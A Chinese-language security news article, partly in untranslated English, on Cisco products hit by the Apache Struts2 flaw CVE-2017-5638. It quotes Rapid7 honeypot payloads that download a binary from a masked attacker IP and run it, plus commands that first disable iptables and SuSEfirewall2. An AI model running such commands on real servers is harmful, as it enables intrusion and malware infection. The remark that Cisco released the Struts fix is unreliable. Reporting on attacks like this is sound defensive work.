周五,思科对客户发出通知称,至少一部分思科产品中存在 Apache Struts2命令执行漏洞 。在过去几天内,该漏洞被攻击者大肆利用。
思科公开了存在Struts 2漏洞的产品列表
经证实,该漏洞已影响到思科身份服务引擎(ISE)、主要服务目录虚拟设备以及统一SIP代理软件。思科已公布了几十个未受影响的产品清单,但很多产品仍在调查中。
Network and Content Security Devices
Cisco Identity Services Engine (ISE) CSCvd49829
补丁有效:1.2, 1.3, 1.4, and 2.x hot patches (18-March-2017)
Network Management and Provisioning
Cisco Prime Service Catalog Appliance and Virtual Appliance CSCvd49816
补丁有效:
psc-patch-12.0.0-1 (13-March-2017)
pscva-patch-12.0.0-1 (14-March-2017)
Voice and Unified Communications Devices
- Cisco Emergency ResponderCSCvd51442
- Cisco Unified Communications Manager IM & Presence Service (formerly CUPS)CSCvd49842
- Cisco Unified Communications Manager Session Management EditionCSCvd49840
- Cisco Unified Communications ManagerCSCvd49840
- Cisco Unified Contact Center EnterpriseCSCvd51210
- Cisco Unified Intelligent Contact Management EnterpriseCSCvd51210
- Cisco Unified SIP Proxy SoftwareCSCvd49788
- Cisco Unity Connection
思科称尚未发现针对其产品攻击的证据
虽然漏洞被积极利用来传播恶意软件,思科尚未发现任何针对其产品攻击的证据。尽管如此,该公司已警示用户,该漏洞的利用程序是公开的。
Struts 2.3.5至2.3.31和Struts 2.5至2.5.10受到了该安全漏洞(CVE-2017-5638)的影响。3月6日,思科发布了Struts 2.3.32和2.5.10.1。第一轮攻击是在概念证明(PoC)利用程序发布后的一天内被发现的。
该漏洞存在于Jakarta Multipart parser分析器内,是因为对Content-Type头值处理不当造成的。未经身份验证的远程攻击者可利用该漏洞通过发送特制的HTTP请求执行任意命令。
研究人员观察到,漏洞利用程序的目标是确定脆弱系统和攻击者试图提交各种类型的恶意软件(包括IRC保镖和DoS/DDoS僵尸)的系统。
思科和其他安全厂商已开始发布防火墙规则来阻止这种攻击。绿盟科技提供了Struts2漏洞 免费在线扫描工具 ,Tinfoil Security公司也提供了 一款在线工具 ,允许网站所有者检查其网站是否受到CVE-2017-5638漏洞的影响。
Rapid7 给出分析称两次恶意请求来自中国
Rapid7一直在监测攻击,并根据蜜罐数据确认了大部分恶意流量来自位于中国的两台机器。
第一次匹配到的恶意请求是在 UTC时间3月7日周二下午15:36 ,恶意请求来自中国郑州的一台主机。 Both were HTTP GET requests for /index.aciton (misspelled) and the commands that they executed would have caused a vulnerable target to download binaries from the attacking server. Here is an example of the commands that were sent as a single string in the Content-Type value:
- cd /dev/shm;
- wget http://XXX.XXX.XXX.92:92/lmydess;
- chmod 777 lmydess;
- ./lmydess;
研究员抽取了一部分代码,以便阅读。这是相当标准的注入命令或 针对web 服务器的远程代码执行攻击。基本上,是让一些地方可写,下载代码,确保其可执行文件,并运行它。
之后恶意请求流量似乎停了,直到UTC时间3月8日周四上午09:02,我们捕获了一次来自中国上海主机的攻击。 The requests differed from the previous attacks. The new attacks were HTTP POSTs to a couple different paths and attempted to execute different commands on the victim:
- /etc/init.d/iptables stop;
- service iptables stop;
- SuSEfirewall2 stop;
- reSuSEfirewall2 stop;
- cd /tmp;
- wget -c http://XXX.XXX.XXX.26:9/7;
- chmod 777 7;
- ./7;
Rapid7是做什么的
Rapid7是一家互联网安全公司。2015 年 7 月,首次公开发行股票。年收入据称超过1亿美金。在 2016 年,他们推出新的产品InsightIDR。
独立研究员Matthew Kienow和来自Rapid7的Tod Beardsly、Deral Heiland分析了9个厂商的网络管理系统,包括Spiceworks、Ipswitch、Castle Rock、ManageEngine、CloudView、Paessler、Opmantek、Netikus和Opsview。